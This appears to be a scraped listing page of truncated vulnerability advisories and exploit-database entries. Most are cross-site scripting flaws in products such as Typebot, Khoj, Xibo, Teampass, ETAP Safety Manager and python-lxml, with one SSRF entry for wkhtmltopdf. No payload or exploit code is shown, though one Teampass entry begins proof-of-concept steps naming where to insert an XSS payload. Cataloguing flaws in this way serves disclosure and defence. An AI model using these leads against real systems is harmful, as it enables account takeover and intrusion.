Typebot 安全漏洞

Typebot is an open-source chat bot builder developed by Baptiste Arnaud. Versions of Typebot 3.15.2 and earlier contained security vulnerabilities. These vulnerabilities stemmed from the RatingButton component in the embed package using Solid’sinnerHTML directive to render the customIcon.svg fiel...

EUVD-2023-32309

Malicious code in bioql PyPI...

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

SafeLine is a self-hosted WAFWeb Application Firewall to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL...

CVE-2024-43412 Xibo CMS XSS vulnerability when previewing files uploaded to the library containing HTML/JS

Xibo is an open source digital signage platform with a web content management system CMS. Prior to version 4.1.0, a cross-site scripting vulnerability in Xibo CMS allows authorized users to execute arbitrary JavaScript via the file preview function. Users can upload HTML/CSS/JS files into the Xib...

CVE-2024-43396 Khoj Vulnerable to Stored Cross-site Scripting In Automate (Preview feature)

Khoj is an application that creates personal AI agents. The Automation feature allows a user to insert arbitrary HTML inside the task instructions, resulting in a Stored XSS. The q parameter for the /api/automation endpoint does not get correctly sanitized when rendered on the page, resulting in...

CVE-2024-43396

CVE-2024-43396 concerns Khoj, an open-source app for personal AI agents. The vulnerability is a Stored XSS in the Automation feature caused by insufficient sanitization of the q parameter in the /api/automation endpoint, allowing injection of arbitrary HTML/JS when the payload is rendered on the ...

Stored XSS via Default session expiration time

Description The Default session expiration time feature when submitted HTML/JS tags executes the code in the login page. Proof of Concept Login to Teampass and go to Settings = Options. http://127.0.0.1/index.php?page=options In theDefault session expiration time input field insert an XSS payload...

Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS

Exploit Title: Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage...

CVE-2023-28648

Osprey Pump Controller version 1.01 inputs passed to a GET parameter are not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site...

Cross site scripting

A Stored Cross Site Scripting XSS issue in ZoneMinder 1.36.12 allows an attacker to execute HTML or JavaScript code via the Username field when an Admin or non-Admin users that can see other users logged into the platform clicks on Logout. NOTE: this exists in later versions than CVE-2019-7348 an...

Cross site scripting

ETAP Lighting International NV ETAP Safety Manager 1.0.0.32 is vulnerable to Cross Site Scripting XSS. Input passed to the GET parameter 'action' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in...

CVE-2022-40912

ETAP Lighting International NV ETAP Safety Manager 1.0.0.32 is vulnerable to Cross Site Scripting XSS. Input passed to the GET parameter 'action' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in...

ESM ETAP Safety Manager 1.0.0.32 Cross Site Scripting Vulnerability

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS Vendor: ETAP Lighting International NV Product web page: https://www.etaplighting.com Affected version: 1.0.0.32 Summary: The ETAP Safety Manager ESM is a central managing and control system that helps you to monitor, adjust and...

ETAP Safety Manager 1.0.0.32 Cross Site Scripting

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS Vendor: ETAP Lighting International NV Product web page: https://www.etaplighting.com Affected version: 1.0.0.32 Summary: The ETAP Safety Manager ESM is a central managing and control system that helps you to monitor, adjust and...

CVE-2022-35583

wkhtmlTOpdf 0.12.6 is vulnerable to SSRF which allows an attacker to get initial access into the target's system by injecting iframe tag with initial asset IP address on it's source. This allows the attacker to takeover the whole infrastructure by accessing their internal assets...

SUSE SLED15 / SLES15 Security Update : python-lxml (SUSE-SU-2022:0803-1)

The remote SUSE Linux SLED15 / SLEDSAP15 / SLES15 / SLESSAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0803-1 advisory. - An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remo...

Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS

Summary DOM XSS on IBM Aspera Shares 1.9.14 Patch Level 1 and earlier could lead to HTML/JS injection and Account takeover. Vulnerability Details CVEID: CVE-2020-4731 DESCRIPTION: IBM Aspera Web Application is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary...

EulerOS 2.0 SP2 : python-lxml (EulerOS-SA-2021-2431)

According to the version of the python-lxml package installed, the EulerOS installation on the remote host is affected by the following vulnerability : - A XSS vulnerability was discovered in python-lxml's clean module. The module's parser didn't properly imitate browsers, which caused different...

Medium: python-lxml

Issue Overview: A Cross-site Scripting XSS vulnerability was found in the python-lxml's clean module. The module's parser did not properly imitate browsers, causing different behaviors between the sanitizer and the user's page. This flaw allows a remote attacker to run arbitrary HTML/JS code. The...

Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting

Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting Date: 2021-05-04 Exploit Author: strider Software Link: https://github.com/savsofts/savsoftquizv5 Vendor: https://savsoftquiz.com Version: 5.0 Tested on: Ubuntu 20.04 LTS / Kali Linux...